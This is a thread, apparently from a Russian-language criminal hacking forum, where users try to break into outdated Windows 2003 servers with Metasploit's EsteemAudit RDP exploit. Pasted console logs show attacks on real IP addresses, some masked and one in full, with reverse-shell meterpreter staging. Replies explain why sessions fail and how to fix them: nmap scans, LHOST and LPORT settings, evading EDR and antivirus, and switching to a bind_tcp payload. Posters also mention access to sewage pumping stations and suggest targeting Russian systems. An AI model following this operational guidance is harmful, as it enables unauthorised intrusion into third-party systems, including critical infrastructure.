Пожалуйста, обратите внимание, что пользователь заблокирован
Haм нужна слава и миллионы, а не доступы к насосным канализационным станцияммного таких серверов в 2023 работает. более чем
Haм нужна слава и миллионы, а не доступы к насосным канализационным станцияммного таких серверов в 2023 работает. более чем
Не работает, а мертвы. Дополню:много таких серверов в 2023 работает. более чем

Ну почему же? В России всё обновлённое, самое последнее, пиратское.В нормальных странах ни одна достойная корпа не будет работать на устаревшем и нелицензионном софте - получат штрафы. А тут что, Win 2003? Расцениваю этот ман как призыв работать по ru![]()

msf6 exploit(windows/rdp/esteemaudit) > set RHOST 223.**.**.**
RHOST => 223.**.**.**
msf6 exploit(windows/rdp/esteemaudit) > set RPORT 18934
RPORT => 18934
msf6 exploit(windows/rdp/esteemaudit) > run
[*] Started reverse TCP handler on ***.***.***.***:4444
[*] 223.**.**.**18934 - Generating Esteemaudit XML data
[*] 223.**.**.**:18934 - Generating payload DLL for Esteemaudit
[*] 223.**.**.**:18934 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 223.**.**.**:18934 - Launching Esteemaudit...
[+] 223.**.**.**:18934 - We are inside, waiting for meterpreter...
[*] Exploit completed, but no session was created.
can u share the rb ?Проверил с десяток подходящих таргетов но сесия не падает в чем может быть проблема ?
Код:msf6 exploit(windows/rdp/esteemaudit) > set RHOST 223.**.**.** RHOST => 223.**.**.** msf6 exploit(windows/rdp/esteemaudit) > set RPORT 18934 RPORT => 18934 msf6 exploit(windows/rdp/esteemaudit) > run [*] Started reverse TCP handler on ***.***.***.***:4444 [*] 223.**.**.**18934 - Generating Esteemaudit XML data [*] 223.**.**.**:18934 - Generating payload DLL for Esteemaudit [*] 223.**.**.**:18934 - Writing DLL in /root/.wine/drive_c/shell.dll [*] 223.**.**.**:18934 - Launching Esteemaudit... [+] 223.**.**.**:18934 - We are inside, waiting for meterpreter... [*] Exploit completed, but no session was created.
Всем welcomeЯ снова на связи
фолс позитивПроверил с десяток подходящих таргетов но сесия не падает в чем может быть проблема ?
Код:msf6 exploit(windows/rdp/esteemaudit) > set RHOST 223.**.**.** RHOST => 223.**.**.** msf6 exploit(windows/rdp/esteemaudit) > set RPORT 18934 RPORT => 18934 msf6 exploit(windows/rdp/esteemaudit) > run [*] Started reverse TCP handler on ***.***.***.***:4444 [*] 223.**.**.**18934 - Generating Esteemaudit XML data [*] 223.**.**.**:18934 - Generating payload DLL for Esteemaudit [*] 223.**.**.**:18934 - Writing DLL in /root/.wine/drive_c/shell.dll [*] 223.**.**.**:18934 - Launching Esteemaudit... [+] 223.**.**.**:18934 - We are inside, waiting for meterpreter... [*] Exploit completed, but no session was created.
Проверил с десяток подходящих таргетов но сесия не падает в чем может быть проблема ?
+ закрыт порт на сервере/на машине, с которой атакуешь. Просканируй cначала nmap´ом на доступность.фолс позитив
не рабочий пейлоад
палит едр\ав
не верно указал лпорт лхост
ось правильно выбрал?приклеился ip одного из таргетов, ничего не помогает как убрать ?
[*] Started reverse TCP handler on my:4444
[*] 104.215.82.1:3389 - Generating Esteemaudit XML data
[*] 104.215.82.1:3389 - Generating payload DLL for Esteemaudit
[*] 104.215.82.1:3389 - Writing DLL in /root/.wine/drive_c/shell.dll
[*] 104.215.82.1:3389 - Launching Esteemaudit...
[*] Sending stage (175686 bytes) to 148.0.2.133
[-] Meterpreter session 1 is not valid and will be closed
[*] 104.215.82.1 - Meterpreter session 1 closed.
[*] Sending stage (175686 bytes) to 148.0.2.133
[-] Meterpreter session 2 is not valid and will be closed
[*] 104.215.82.1 - Meterpreter session 2 closed.
[*] Sending stage (175686 bytes) to 148.0.2.133
даось правильно выбрал?
поменяй на bind вместо reverseда
обьясни. может еще кому то пригодитсяпоменяй на bind вместо reverse
set payload windows/meterpreter/bind_tcpобьясни. может еще кому то пригодится
if this exploit which you are using, is a new one, i am intended to get itI checked with a dozen suitable targets, but the session does not fall, what could be the problem?
Код:msf6 exploit(windows/rdp/esteemaudit) > set RHOST 223.**.**.** RHOST => 223.**.**.** msf6 exploit(windows/rdp/esteemaudit) > set RPORT 18934 RPORT => 18934 msf6 exploit(windows/rdp/esteemaudit) > run [*] Started reverse TCP handler on ***.***.***.***:4444 [*] 223.**.**.**18934 - Generating Esteemaudit XML data [*] 223.**.**.**:18934 - Generating payload DLL for Esteemaudit [*] 223.**.**.**:18934 - Writing DLL in /root/.wine/drive_c/shell.dll [*] 223.**.**.**:18934 - Launching Esteemaudit... [+] 223.**.**.**:18934 - We are inside, waiting for meterpreter... [*] Exploit completed, but no session was created.